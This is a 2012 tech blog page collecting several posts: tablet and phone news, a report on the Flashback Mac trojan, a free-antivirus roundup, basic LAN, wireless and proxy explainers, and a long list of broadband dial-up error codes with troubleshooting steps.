All about new technology update

New tech. updated daily so do visit the blog

Monday, April 30, 2012

Aakash 2: Data wind launched Ubislate 7c & Ubislate 7+

Aakash tablet maker’s Datawind UK based company which was previously been highly criticised for there  first Aakash tablet to be very slow , Unusual Crashing of apps , and at the delievery time screen broken. Now with new hope Datawind launches two new tablets Ubislate 7+ and Ubislate 7c which is also called as the commerical version of Aakash Tablet. As the previous Aakash lagged in terms of processor [256 MHz] , Internal Memory and a marketplace for downloading Android apps and games.

Now everything taken into consideration after very huge customers feedback. Datawind has succeeded to create two tablets which will not make the customers this time unhappy. Ubislate 7+ and 7c are very much identical in specification except Display and internal memory storage.

In Ubislate 7c

you would get 7 inch capacative touch screen, 4GB internal onboard memory, Android 2.3 Gingerbread version with a promise from company that it will soon get an ICS updates, Cortex A8  800MHz processor which won’t let apps and games to be crashed unusally. For connectivity it has Sim card slot which only supports GPRS connection sorry guys still it doesnot comes with 3G sim connectivity but you can use 3G Dongles or Modem for the 3G connectivity, Micro-SD card slot available with no memory card available with the purchase and it has full sized USB port which can be used connect Pen-drives, modems, Webcams and other peripherls devices. It comes with a price tag of Rs. 3999 which is from my point of view it is way much cheaper as the features and specs it offers.

Ubislate 7+

It has same Specifications and features as Ubislate 7c had but it has 7 inch  800*600 pixels resistive touchscreen with 2GB internal memory.It’s price is RS.2999 which is also great.

What are the new features added on these two tablet which is also called as sequeal of Aakash tablet or Aakash 2 :

Getjar embeded in it for downloading Games and apps. Getjar also offers wide range of  premium apps for free. DataWind also ties up with  Indian Express group, InMobi, Poketalk and Yahoo India to increase the usability of the tablet.



DATAWIND has also partnered with give aircel to give you unlimited data at Rs.98

Which one should you go for Ubislate 7+ or Ubislate 7c?

As Ubislate comes in Rs.2999 but i would recommend you to for Ubislate 7c which is about Rs.3999 . As Ubislate7+  has  resistive touchscreen which decreases the overall user interface experiences and Hello, Guys don’t you have learn anything from the first  Aakash tablet it has resistive touchscreen which was much like the china mobile touchscreen choice is yours.

Firewall administration




                                                                         Firewall


In my previous two articles I showed you how to secure your LAN and WLAN. In that i had mentioned the firewall factor. In this article I am going to show you the uses of firewall and its administration. Firewall Administration is ensuring the proper management, configuration, and change management of it.It is comprised of controlling access to the platform, platform operating system builds, log reviews, time synchronization and backups.Hence firewall is very important in a network. Some of the advantages and uses of firewall are as follows.
  • The main and the most important factor of firewall is your computer security. It gives a sence of a secure connection of your computer.
  • The most inexpensive and security tool.
  • You can monitor incoming and outgoing security alerts and the firewall company will record and track down an intrusion attempt depending on the severity.
  • Some firewalls are also useful as they detect viruses and worms.
  • All firewalls can be tested for effectiveness by using products that test for leaks or probe for open ports.
What is firewall administration ?
Personal firewall software is designed to prevent connections between the network and your computer, except for programs that the firewall software knows that they are not infected.
  • Network Magic needs to make network connections to set up sharing and check for updates, your firewall software needs to allow these connections.
  • Network Magic is permitted to make outbound communications.
  • Inbound communication from other computers running Network Magic is permitted to get past the firewall to Network Magic.
  • Outgoing communication: Most software firewalls have settings for specific program control.
As we say that any coin has two opposite sides firewall also consists of some of the disadvantages like:
  • Firewalls cannot protect you from internal sabotage within a network or from allowing other users access to your PC.
  • Firewalls cannot edit indecent material like pornography, violence, drugs and bad language. This would require you to adjust your browser security options or purchase special software to monitor your childcare’s Internet activity.

New Variant Of Flashback For Mac Attacks Again [Updates]


Flashback, the Mac OS X trojan , just won’t go away in spite of numerous Apple updates designed to patch the Javascript security hole that Flashback was jumping through.
The latest version, discovered on Monday by the Intego, has been labeled Flashback.S. It spreads using the same vulnerability as earlier versions, which means that it requires no password prompt to install itself on a targeted system.
There’s a new trick, too – this variant will delete files in ~/Library/Caches/Java/cache to remove traces of the trojan and prevent the recovery of samples by security firms (a ruse that,
obviously, hasn’t worked).

If you haven’t already updated your Mac (shame on you!), do so now. Apple’s updates to patch the flaw used by Flashback will work against this and all other know versions. The patch can be downloaded using the update service built in to OS X.
You can also protect yourself by installing an antivirus. According to Intego, Flashback does not even attempt to install itself on systems protected by certain software. This has been true since the original version and is likely an attempt to slow the detection of new variants.

The 10 Best Free Anti-Virus Programs




This article really needs no introduction. There are many free anti-virus programs on the market, and you want to sort the wheat from the chaff. Fair enough. Documented here are the 10 best antivirus programs on the market.
While I won’t attempt to rank the programs here (in many ways the programs can’t be compared), I will attempt to give you an idea of under what circumstances they will be useful.
The order here for the 10 best antivirus programs  is mostly random, so be sure to read every entry if you want an idea of what will work for you.

Microsoft Security Essentials

10 best antivirus programs
Released by Microsoft in late 2009, Microsoft Security Essentials sports more than a typically verbose Microsoft name: it’s also a really good antivirus. Lightweight enough to run on older machines without crippling their performance, yet competent enough to handle most viruses and malware out there.
Perhaps the best part of MSE is its simplicity. As you can see, the user interface is really clear, with large buttons for the most basic functions. This is important if you’re setting it up on a computer for someone who is not computer-savvy.
Finally, MSE is completely free – there’s no professional version you can upgrade to. In fact, it’s even permissible to use in business situations, meaning you can use it at work without breaking the law. This alone sets it above most of the other selections for the 10 best antivirus programs.
 download MSE here.

AVG Free

This one recently topped our Movers and Shakers list of the top downloaded free anti-virus programs. But just because AVG is popular doesn’t mean it’s not great.
AVG has become synonymous with free anti-virus, and there’s a reason for this: AVG offers complete malware protection, with considerably less bloat than the top pay-to-use antivirus clients. And while AVG Free does constantly remind you that you could pay for the professional version of the program, it does this without ever getting in the way of the program’s core purpose: protecting you from viruses.
10 best antivirus programs
Though when it comes to upgrading one version of AVG to another, you need to make sure you’re good at reading what’s on screen, because the free download is only available via a tiny link at the bottom of the screen””the site really wants you to get the paid version. When upgrading to version 9 recently, for example, check out how hidden the free download was:
10 best antivirus programs
Not exactly a big link, is it? Figure this minor inconvenience out, however, and AVG is a a really good free anti-virus. Download AVG.

Avira Free

free antivirus programs
In terms of simplicity, Avira’s right up there with MSE. It’s fairly lightweight, too, so the comparison is quite apt. While Avira does have a paid professional version to peddle, much like AVG, it’s not quite as aggressive as AVG in peddling it. I’d say Avira is solid and worth looking into for sure. Download Avira Free here.

Avast! Free

If this competition were for the coolest name, the piratey Avast! would win hands down. Even though that’s not what we’re discussing, Avast! stands up pretty well. This is one of the top free anti-viruses on the market, and for good reason: it’s remarkably complete. Expect great all-around protection, including against trojans and spyware. You can also expect constant reminders that there’s a free version you can upgrade to, on your desktop and in your inbox. Still, the protection is solid.
Download Avast! here.

Malwarebytes

free antivirus programs
Whatever your default anti-virus is, you need Malwarebytes too. This program doesn’t run in your system background and constantly protect you, but when you run into a problem running Malwarebytes will usually take care of what other programs can’t. I’ve saved more than a few unbootable systems by running Malwarebytes from safe mode. This program takes care of any form of malware you throw at it, so keep it around. In fact, I’d keep this one on your flash drive in case you ever need to fix a computer for a friend (and if you’re reading this blog, you probably will).
Download Malwarebytes.

ComboFix

Consider this the nuclear option. If you know you’ve got a virus, but your usual anti-virus program can’t handle it, and Malwarebytes can’t handle it, it’s time for ComboFix. This program isn’t friendly: it runs from a command window and is proud of it.  And this is not a program you should use if you don’t know what you’re doing, because it can have devastating effects in the hands of the uneducated. But when all else fails, ComboFix delivers. Every geek should have this one on their keychain.
Download Combofix.

Clamwin

free antivirus programs
Clamwin is the Windows version of ClamAV, the main Linux anti-virus on the market. ClamWin is flawed in many ways: it simply scans instead of offering real-time protection, it doesn’t really do non-virus malware and it’s not exactly easy to use. Still, having ClamWin around doesn’t cost anything, and you can never have enough scanning tools in your arsenal.
Download ClamWin and see if you like it.

Panda Cloud AntiVirus

totally free antivirus programs
At first I thought the idea of a cloud-based antivirus was stupid, because it would only work while I’m online. Then it occurred to me: why the heck do I need an anti-virus when I’m offline?
As the name suggests, Panda Cloud Antivirus stores its virus definitions online. There’s an upside to this: your definitions are always up to date. There’s a downside, too, however: your anti-virus is constantly making use of your network connection.
I’d say this is a really good idea for underpowered PCs with constant access to the net. Like, say, a netbook. But if you’ve got a netbook you shouldn’t be using Windows anyway; switch to Jolicloud and you’ll have a functional netbook operating system immune to practically every virus.
 download Panda Cloud Antivirus if you’re interested.

Comodo Firewall + Antivirus

Comodo is best known for its free firewall, but it also offers a bundled firewall and antivirus program. While the Comodo firewall isn’t the easiest to use, and the antivirus doesn’t include protection for non-virus forms of  malware, this one’s worth mentioning if you’re looking for a free security suite which includes both a firewall and anti-virus protection.
totally free antivirus programs
Download Comodo Free here.

Common Sense 2011

This one’s unusual in that it’s free and considered by far the best protection out there, yet can’t be downloaded anywhere. Without it, however, even the best security software is rendered useless.
If you haven’t already figured this out, Common Sense 2011 isn’t a product you can download so much as it is a state of mind. If you’re going to be free of viruses and malware you need to use your head while browsing the web. The most important thing to remember is this: if something sounds too good to be true, it probably is””and your computer will probably be compromised.
Free porn usually isn’t. Warez are best to be avoided altogether. Nigerians that need your help transferring money are never actually princes or princesses. You get the idea: avoid shady sites online and you’ll find you’ll get far less malware on your machine.

Conclusion

There are a lot of great free anti-virus programs out there, but what you use is mostly a matter of preference. Myself, I use Microsoft Security Essentials on my Windows machine because it’s free, lightweight and will never ask me for money. But I also make sure I always have Malwarebytes on my thumb drive for quickly removing viruses and malware from the computers of friends and family.
What about you? Which free anti-virus do you prefer? Commenting is good for you, so do so!

Saturday, April 28, 2012

Sony Launches First Waterproof Handycam (video)

Sony has this week added a new waterproof Handycam to their range of video recorders in the form of the Sony HDR-GW77V. Which has been designed to go under water in depths of up to 16 ft for up to 60 minutes.
The Sony HDR-GW77V Handycam is equipped with a 20.4-megapixel resolution, full 1080p video capture @ 60fps, and 10x optical zoom. With 16GB of internal storage that can be expanded using SDHC or Memory Stick Micro cards to suit your needs.


Its also equipped with a neat fold out LCD viewing panel and measures just 1.2 (width) x 4.15 (height). Watch the video below to see it drop tested.As well as being waterproof the new Sony HDR-GW77V Handycam is also rugged and can withstand 5ft drops.

Its also equipped with a neat fold out LCD viewing panel and measures just 1.2 (width) x 4.15 (height). Watch the video below to see it drop tested.As well as being waterproof the new Sony HDR-GW77V Handycam is also rugged and can withstand 5ft drops.
Unfortunately no information on pricing or worldwide availability has been released for the Sony HDR-GW77V Handycam as yet, but it will soon be arriving in Japan for around 70,000 yen around $862.
Source: CNET

BlackBerry Curve 9320 Press Shots Revealed

The guys over at the Verge have got their hands on some press shots of RIM’s latest BlackBerry smartphone, the BlackBerry Curve 9320, the device is designed for the budget and emerging markets.
RIM has yet to officially announce the new BlackBerry Curve 9320, so we don’t have the full specifications, what we do know is that it will comer with a physical QWERTY keyboard and will run BlackBerry OS 7.1.
BlackBerry Curve 9320
The BlackBerry Curve 9320 is expected to be officially announced next week, as soon as we get some more information, including the handsets full specifications, and some pricing we will let you guys know.
Source The Verge

Apple’s New iPad Launched In Nine More Countries

Apple’s new iPad has already become very popular for the company, and now Apple has launched their new iPad in nine more countries around the world, making the device available in a total of 57 different countries.
From today the new iPad is available Colombia, Estonia, India, Israel, Latvia, Lithuania, Montenegro, South Africa and Thailand, which are bound to add to Apple’s massive sales of the new device.


We got a look at Apple’s recent financial reports earlier in the week, where they reported that they had sold more than 35 million iPads in their most recent financial quarter.
Source The Next Web

Android 5.0 Jelly Bean Headed To GSM Samsung Galaxy Nexus First?

The next version of Google’s Android OS, which will be Android 5.0 is rumored to be codenamed Android Jelly Bean, and it is rumored to launch some time in quarter three of 2012.
It looks like the GSM Samsung Galaxy Nexus may be the first handset to get the Android 5.0 Jelly Bean update, the information regarding the update comes from a crash log that refers to a mysterious software profile called ‘takju’ which was discovered by the guys from Android Police.


We still don’t have any official confirmation from Google on when Android 5.0 Jelly Bean will launch, and we suspect we will have to wait a couple of months to get confirmation.
Source Ubergizmo

Entry Level Sony Xperia ST21i Android 4.0 Smartphone Leaked

It looks like Sony has a new budget Android smartphone in the works, the Sony ST21i which is expected to come with the latest version of Google’s mobile OS, Android 4.0 Ice Cream Sandwich.
The guys over at Techblog.gr managed to get their hands on some photos of the new Sony ST21i, which you can see below and the device is rumored to be powered by a single core Snapdragon processor clocked at 800MHz.


Other specifications on the Sony ST21 i include an Adreno 200 GPU, plus a 3.2 inch LCD touchscreen display with a resolution of 320 x 480 pixels, and a 3 megapixel rear facing camera.
As soon as we get some more specifications on this new entry level Android smartphone from Sony, along with some pricing details we will let you guys know.
Source GSM Arena

Saturday, April 21, 2012

Secure your LAN



In thi short tutorial where you will come to know the basics of LAN security. As far as LAN security is concerned firewalls, anti-viruses play an important role in it. Viruses can affect your pc or your entire network. Hence it is very important to ensure that your connection is secure. Security of LAN is sub-divided in two parts.
  • Manual security
  • With tools security.
As far as manual security is concerned, it takes into consideration pendrive, CD, DVD,etc. Ensure that these stuffs you are going to insert are pre scanned and does not contain any viruses. This can harm your entire network. Secondly do not allow any of your friend to take an access of your server, or do not revel any passwords that you have set for firewalls and your TCP ports. This could take away your entire privacy. With tools security play a most important part in LAN security.  Tools like Port Monitors & Trojan Cleaners should be given a big existence in LAN security.Port monitors are programs that you install on your computer.   They are simpler than the Personal Firewalls in that their main purpose is to detect incoming port scans on your computers.  Some also shut down an unauthorized scan, but for that capability you usually need to use a firewall. Trojan cleaners  look for Back Orifice and NetBus. Two common and most important tools
are specially meant to have a look on the TCP and UDP ports. This look after the attack on the system over internet.A total of 50 ports can be looked after at the same time.

Secure your Wireless network


In my previous article i showed you the tricks and techniques to protect your LAN connection. In this article i will show you how to secure your Wireless LAN. As in the previous article LAN security was sub divided into two parts, similarly Wireless LAN security is also divided into two parts. The difference is in the security issues.With Wireless Networking, no cables or wires are needed to network your computers and share your Internet connection. Wi-Fi connects computers, printers, video camera’s and game consoles into a fast Ethernet network via microwaves.
Following actions should be taken.
  • The most important thing is to change the default password of your access point.
  • Firmware and the drivers of your wireless access point and wireless adapters should be up to date. They should be updates whenever necessary.
  • There should be a combination of high level encryption and decent keys (WPA2/802.11i ) recommended.
  • Wireless users should be authenticated with different protocols like 802.1X, RADIUS, EAP (including EAP-PAX, EAP-PSK, EAP-TLS, EAP-TTLS, EAP-FAST, EAP-POTP, EAP-IKEv2, EAP-GPSK, PEAP, and EAP-SIM.
  • The above protocols give credentials including certificates, usernames, passwords etc.
  • Use Wireless LAN Security Tools for securing the wireless network. This software is specifically designed for securing 802.11 wireless networks.
  • Use a proxy for outgoing requests.
  • Always check the security of the wireless LAN using recent tools like Airbase, AirCrack-ng etc.
  • Make strict system logging on all the devices, do check your wireless log files regularly.

What is a proxy server? When do we need one?

Latin word proximus which means “close”.A proxy is actually a server which helps us maintaining our privacy on the Internet. It is just like a wall between you and the Internet. When you use a proxy, the webpage on the other side won’t be able to see you, webpage interacts with the proxy and proxy in return shows us the webpage. In this way a proxy server works.


A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules.
For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client’s request or the server’s response, and sometimes it may serve the request without contacting the specified server.
A proxy server can be used for various purposes such as :
  • Hiding machine or other servers from public. It provides security.
  • To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.
  • To open blocked sites in college schools and some times in offices.
  • To bypass security/ parental controls.
  • To protect your real identity on internet.
A proxy server that passes requests and replies unmodified is usually called a gateway or sometimes tunneling proxy.A proxy server can be placed in the user’s local computer or at various points between the user and the destination servers on the Internet.
A reverse proxy is (usually) an Internet-facing proxy used as a front-end to control and protect access to a server on a private network, commonly also performing tasks such as load-balancing, authentication, decryption or caching.
It was all general about proxies. In my next article i will discuss how to use online proxies and using proxy along with your browser. I will discuss how to configure proxy with either Internet Explorer  or Mozilla firefox. If you want me to discuss how to configure proxy in browser you use, you can leave browser name in comments. I will discuss proxy configuration in that browser which will receive maximum votes.

Broad Band Error Codes and Solution

error for broadband
error for broadband

Broad Band Error Codes and Solution

If you are customer of broadband you must have experienced these or at least some of these errors at least once in your system
and then you keep scratching your head that what the hell went wrong when you were doing every thing according to the manual.
Well then its time for you to shampoo you scalp and stop scratching it cause here are those common errors and there solutions too.

1) Possible solution / fix for error 619

Broadband error 619 – The port is disconnected
Possible solution for error 619: Restart your computer and wait until all applications have completely loaded before
trying to reconnect. Check your modem and phone cables are connected securely. If your problem has still not been
resolved uninstall and reinstall your Broadband modem.
Error 619: The port is disconnected – Error 619 often occurs when another application / process requires the same port as
being used by the broadband / internet modem. In particular, fax software is often associated with error 619. Should you
encounter error 619 whilst using fax software – disable the fax software and reboot. The quick / common fix for Error 619
is to shut down / reboot, thus forcing the offending port to close.
To fix error 619, try the following steps:
1. Restart / reboot PC. Wait until all applications have loaded before reconnecting.
2. Check all modem, phone cables and filters.
3. If error 619 persists – uninstall and reinstall your Broadband modem. Sometimes, error 619 can be caused where old
ISP modem software is conflicting with newer modem software. Therefore, ensure that any old software is removed and
retest the connection.

2) Possible solution / fix for error 629

Error 629 – The port was disconnected by the remote machine
Possible solution for error 629: Restart your computer and wait until all applications have completely loaded before
trying to reconnect. Recreate the Dial Up Connection. If your problem has still not been resolved uninstall and reinstall
your Broadband modem.
Error 629 – further information
Error 629 generally means that the remote computer (ISP) is closing / disconnecting the port. This might be due to
incorrect connection settings such as incorrect username and / or password. Having checked these settings, if error 629
persists, it would be wise to check ISP server status for any server outages or other ISP related problems.
Having checked connection settings, ISP server status – the next step would be to check all modem connections, cables
and broadband filters – followed by a PC and modem reboot. If Error 629 has still not cleared, you may wish to revert to
either local or ISP technical support…or google error 629 to see what the forums have to offer.
One such listing details the causes of Error 629 as follows:
The modem driver is corrupt
The DUN connection is dialling an invalid access number
The modem is not attempting a compatible connection
Authentication failure (invalid username or password)
Invalid or corrupt DUN connection settings
And if you have anything further to offer regarding Error 629 – please do not hesitate to get in touch.

3) Broadband error code 631

Error 631 – The port was disconnected by the user
With error 631, the user disconnected themselves – there is usually no fix required – just connect again. Error 631 is
usually a one-off glitch, caused when connection is interrupted by the user or another program on the PC.
Possible solution / fix for error 631
Possible solution for error 631
Error 631 is usually a one-off error which happens when the connection is interrupted by the user or another program on
the PC. In order to resolve Error 631, all that is usually required is a restart and to wait until all applications have
completely loaded before trying to reconnect. Recreate the connection and usually – no more error 631.
In some circumstances, Error 631 can be caused by incorrect connection settings or by using the wrong modem or
modem software. If a simple restart does not fix your error 631, check that the modem is correctly installed and
connected, whilst ensuring that any old modem software has been uninstalled. If error 631 persists, technical support
might be required or a google for error 631 to see if the forums have anything to offer.

4)Broadband error code 633

Error 633 – The port is already in use or is not configured for Remote Access
Possible solution / fix for error 633
Possible solution for error 633
Error 633 – The port is already in use or is not configured for Remote Access dialout
Error 633 is similar to Error 619 error and is often caused by other applications attempting to use the broadband modem,
incorrect connection settings and sometimes a corrupt modem driver.
Error 633 can usually be resolved with a PC restart. This works 50% of the time. Failing this, error 633 might require best
the user to disable any Firewall Software. Try to connect again. Recreate the connection and finally, try uninstalling and
reinstalling the Modem.

5) Broadband error code 645

Error 645 – Internal authentication error
Possible solution for error 645
This problem tends to occur with users of Windows 98 or Windows ME and can often be resolved via the following steps:
Recreate the Connection.
Windows 95/98 – This error can occur if the Require encrypted password option is enabled
on the Server Types tab in the connection’s properties, or an incorrect user name or password have been entered.
All versions of Windows – This error can occur if you are
attempting to connect to a Windows 2000 domain that has had a RRAS (Routing and Remote Access Services) server log
on without administrative privileges

6) Broadband error code 650

Error 650 – The Remote Access server is not responding
Error 650 can occur if the ISP server modem/equipment is not set up properly.
Possible solution / fix for error 650
Possible solution for error 650
The most likely reason for one of the above errors is a Network Problem. Consider the following steps:
. After receiving
this error wait 15 minutes and then restart your computer. Once it has restarted wait until all applications have
completely loaded before trying to reconnect.
. If you receive the same error, check with your service provider for
Network Outages. You may need to be patient.
If there are no network outages, the problem may originate from your
computer. In this case recreate your connection and if this fails to resolve the problem, uninstall and reinstall your
Broadband modem.

7) Broadband error code 651

Error 651 – Your modem (or other connecting device) has reported an error
Possible solution / fix for error 651
Error 651 – Your modem (or other connecting device) has reported an error.
Error 651 usually points to a driver error or modem hardware failure. To resolve Error 651, first ensure that the modem is
correctly connected to the PC and telephone line, with all points covered with broadband filters. Ensure that full
connectivity is indicated on the modem. Having checked these things – restart. If this does not resolve the error 651, go
through an uninstall and reinstall of the modem software. Thereafter, if Error 651 persists, it’s possible that the modem is
faulty. If the modem is the USB variety, try connecting to a different USB port on the PC or another PC entirely to confirm
that it is not a problem with USB port. If Error 651 still persists, technical support is indicated.

8) Possible solution / fix for error 678

Broadband error 678 – There is no answer
Error 678 is usually associated with Windows XP and can normally be resolved by restarting and waiting until all
applications have completely loaded before trying to reconnect. Although ADSL modems do not dial to connect to the
internet, error 678 – no answer – can still occur and sometimes results because there is an invalid number entered for the
computer to dial.
The following steps are often indicated to fix Error 678:
Click on the Start Menu and then select Run.
In the box which appears type the word command in order to open the command prompt and then click OK.
In the black command prompt window, type netsh interface ip reset log.txt and click on Enter on your keyboard.
Then type exit into the command prompt and then click on Enter on your keyboard.
Now restart your computer and reconnect to the Internet.

9) Possible solution / fix for error 691

Broadband error 691 – Access denied because username and/or
password is invalid on the domain

With all Windows versions – Error 691 can occur if you use a bad username or password; remember in most instances the
password is case-sensitive – you will not see the password, so if CAPS LOCK is not the way you expect it, you may have a
problem with upper/lower-case. It may also occur if there is a problem with your service provider’s access equipment, or
on a ‘bad’ connection where the modem is retraining. Can also occur with incorrect Connectoid settings.
If you get error 691 with a new account – you may not be using the correct username and/or password. Verify with your
provider exactly what you need for your username and password.

10)Possible solution / fix for error 718

Broadband error 718 – PPP timeout
Error 718 indicates a PPP conversation was started, but was terminated because the remote server did not respond within
an appropriate time. This can be caused by poor line quality or a problem with the server (ISP). This error can occur
when your modem has connected to the ISP and has sent username and password, but there is no response from the
server. Sometimes, re-dialing will be successful.Error 718 can also occur if your ISP account has expired, or if the username or password you are using is invalid. Error
718 can occur if you have LCP extensions enabled in the TCP/IP Properties of the connectoid and your ISP does not
support LCP extensions.
Error 718 may also occur if you have one or more network cards in your machine, and the cards do not have TCP/IP
protocol enabled, or if the TCP/IP settings are incorrect. (Go to Networking in Control Panel to examine the properties of
your network adapters; or, if you are not using the network card(s), disable them in Control Panel->System->Hardware.)

11) Broadband error 721 – Remote PPP peer is not responding

Possible solution / fix for error 721
Make sure your line is working by testing for a dial tone on your phone. Unplug, reboot and plug in again to ensure the
driver has loaded. If there’s still no joy, don’t discount the possibility of a faulty modem.
More about Error 721
Error 721 generally means that there is a problem with the remote PPP – the PPP server resides with the Internet /
broadband provider and is the computer at ‘the other end of the line’ that establishes connections to the Internet. The
majority of Error 721 messages are caused by a ‘problem’ with the Internet service provider. Most Internet service
providers have a number that can be called to check their service status. With Error 721 problems, it is therefore worth
checking the ISP’s service status before checking other possible causes.
Another possible cause of Error 721 messages can be displaced modem connections, adsl cables and / or broadband
filters. If an Error 721 message has not been caused by the ISP, it would be prudent to check all such connections.
Common advice is then to shut down both modem and PC and to wait 5-10 minutes before restarting them. Wait until all
PC application have fully loaded before attempting to reconnect to the Internet.
Where there are no ISP service issues and all modems, filters, cables are correctly connected – another possible Error 721
fix would be to check all associated PC settings and to update / uninstall modem drivers, reboot and reinstall them again
and whilst doing so – take care not to connect the modem until prompted to do so by the setup program.
Where no fix is found for Error 721, if time allows – wait 24 hours and try again or seek either local or ISP technical
support. You might also be advised to google for error 721 as there is a wealth of information available via the various
forums and blogs.
And should you have anything to add or offer regarding error 721, please do not hesitate to contact us.

12) Possible solution / fix for error 797

Possible solution for error 797
Restart your computer and wait until all applications have completely loaded before trying to reconnect.
If your problem has still not been resolved uninstall and reinstall your Broadband modem.

13) Broadband error 680 – No dial tone

Possible solution / fix for error 680
Error 680 usually means there is a problem receiving the Broadband signal at your modem.
Error 680 (no dial tone) has a great many potential causes. The best way to resolve Error 680 is to work logically to rule
out each potential cause. The first consideration is to know if the broadband connection is actually live. Installing modem
and modem software can result in Error 680 if the ‘go-live’ date has yet to be reached. The next ‘fault find’ is to ensure
that the modem is connected to the telephone master socket, whilst ensuring that all extension cables, phone splitters
and all other devices have been removed. Disconnect faxes, alarms and Sky TV (if connected) and once removed,
attempt a broadband connection direct via the telephone master socket (ensuring that a broadband microfilter is being
used. If Error 680 persists, try using a replacement microfilter (sometimes a cause of error 680). The next thing to
consider with Error 680 is electrical interference from cordless / digital phones and any other potential sources of
electrical energy. Having ruled out all of these potential causes, one remaining consideration would be to update the
modem drivers, which in most cases can be obtained from the manufacturers website.
If after these steps, Error 680 persists, technical support would be the next course of action.

OTHER ERROR CODE :

600 An operation is pending.
601 The port handle is invalid.
602 The port is already open.
603 Caller’s buffer is too small.
604 Wrong information specified.
605 Cannot set port information.
606 The port is not connected.
607 The event is invalid.
608 The device does not exist.
609 The device type does not exist.
610 The buffer is invalid.
611 The route is not available.
612 The route is not allocated.
613 Invalid compression specified.
614 Out of buffers.
615 The port was not found.
616 An asynchronous request is pending.
617 The port or device is already disconnecting.
618 The port is not open.
619 The port is disconnected.
620 There are no endpoints.
621 Cannot open the phone book file.
622 Cannot load the phone book file.
623 Cannot find the phone book entry.
624 Cannot write the phone book file.
625 Invalid information found in the phone book.
626 Cannot load a string.
627 Cannot find key.
628 The port was disconnected.
629 The port was disconnected by the remote machine.
630 The port was disconnected due to hardware failure.
631 The port was disconnected by the user.
632 The structure size is incorrect.
633 The port is already in use or is not configured for Remote Access dialout.
634 Cannot register your computer on the remote network.
635 Unknown error.
636 The wrong device is attached to the port.
637 The string could not be converted.
638 The request has timed out.
639 No asynchronous net available.
640 A NetBIOS error has occurred.
641 The server cannot allocate NetBIOS resources needed to support the client.
642 One of your NetBIOS names is already registered on the remote network.
643 A network adapter at the server failed.
644 You will not receive network message popups.
645 Internal authentication error.
646 The account is not permitted to log on at this time of day.
647 The account is disabled.
648 The password has expired.
649 The account does not have Remote Access permission.
650 The Remote Access server is not responding.
651 Your modem (or other connecting device) has reported an error.
652 Unrecognized response from the device.
653 A macro required by the device was not found in the device .INF file section.
654 A command or response in the device .INF file section refers to an undefined macro
655 The macro was not found in the device .INF file section.
656 The macro in the device .INF file section contains an undefined macro
657 The device .INF file could not be opened.
658 The device name in the device .INF or media .INI file is too long.
659 The media .INI file refers to an unknown device name.
660 The device .INF file contains no responses for the command.
661 The device .INF file is missing a command.
662 Attempted to set a macro not listed in device .INF file section.
663 The media .INI file refers to an unknown device type.
664 Cannot allocate memory.
665 The port is not configured for Remote Access.
666 Your modem (or other connecting device) is not functioning.
667 Cannot read the media .INI file.
668 The connection dropped.
669 The usage parameter in the media .INI file is invalid.
670 Cannot read the section name from the media .INI file.
671 Cannot read the device type from the media .INI file.
672 Cannot read the device name from the media .INI file.
673 Cannot read the usage from the media .INI file.
674 Cannot read the maximum connection BPS rate from the media .INI file.
675 Cannot read the maximum carrier BPS rate from the media .INI file.
676 The line is busy.
677 A person answered instead of a modem.
678 There is no answer.
679 Cannot detect carrier.
680 There is no dial tone.
681 General error reported by device.
682 ERROR WRITING SECTIONNAME
683 ERROR WRITING DEVICETYPE
684 ERROR WRITING DEVICENAME
685 ERROR WRITING MAXCONNECTBPS
686 ERROR WRITING MAXCARRIERBPS
687 ERROR WRITING USAGE
688 ERROR WRITING DEFAULTOFF
689 ERROR READING DEFAULTOFF
690 ERROR EMPTY INI FILE
691 Access denied because username and/or password is invalid on the domain.
692 Hardware failure in port or attached device.
693 ERROR NOT BINARY MACRO
694 ERROR DCB NOT FOUND
695 ERROR STATE MACHINES NOT STARTED
696 ERROR STATE MACHINES ALREADY STARTED
697 ERROR PARTIAL RESPONSE LOOPING
698 A response keyname in the device .INF file is not in the expected format.
699 The device response caused buffer overflow.
700 The expanded command in the device .INF file is too long.
701 The device moved to a BPS rate not supported by the COM driver.
702 Device response received when none expected.
703 ERROR INTERACTIVE MODE
704 ERROR BAD CALLBACK NUMBER
705 ERROR INVALID AUTH STATE
706 ERROR WRITING INITBPS
707 X.25 diagnostic indication.
708 The account has expired.
709 Error changing password on domain.
710 Serial overrun errors were detected while communicating with your modem.
711 RasMan initialization failure. Check the event log.
712 Biplex port is initializing. Wait a few seconds and redial.
713 No active ISDN lines are available.
714 Not enough ISDN channels are available to make the call.
715 Too many errors occurred because of poor phone line quality.
716 The Remote Access IP configuration is unusable.
717 No IP addresses are available in the static pool of Remote Access IP addresses.
718 PPP timeout.
719 PPP terminated by remote machine.
720 No PPP control protocols configured.
721 Remote PPP peer is not responding.
722 The PPP packet is invalid.
723 The phone number, including prefix and suffix, is too long.
724 The IPX protocol cannot dial-out on the port because the computer is an IPX router.
725 The IPX protocol cannot dial-in on the port because the IPX router is not installed..
726 The IPX protocol cannot be used for dial-out on more than one port at a time.
727 Cannot access TCPCFG.DLL.
728 Cannot find an IP adapter bound to Remote Access.
729 SLIP cannot be used unless the IP protocol is installed.
730 Computer registration is not complete.
731 The protocol is not configured.
732 The PPP negotiation is not converging.
733 The PPP control protocol for this network protocol is not available on the server.
734 The PPP link control protocol terminated..
735 The requested address was rejected by the server..
736 The remote computer terminated the control protocol.
737 Loopback detected..
738 The server did not assign an address.
739 The remote server cannot use the Windows NT encrypted password.
740 The TAPI devices configured for Remote Access failed to initialize or were not installed
correctly.
741 The local computer does not support encryption.
742 The remote server does not support encryption.
743 The remote server requires encryption.
744 Cannot use the IPX net number assigned by the remote server. Check the event log.
752 A syntax error was encountered while processing a script.

Bandwidth, What is Bandwidth, What does Bandwidth mean ?

Many a times we hear the word bandwidth and some of us keep wondering that what bandwidth is really. How does it determine our internet speed? Why do many hosting companies provide many bandwidth options In their plans?
Bandwidth can be defined as how much data capacity a particular network segment has to offer or in a layman’s language, it is a data transmission rate; the maximum amount of information (bits/second) that can be transmitted along a channel. Bandwidth determines the amount of data exchange that can take place between your computer and internet.
Bandwidth Distribution System
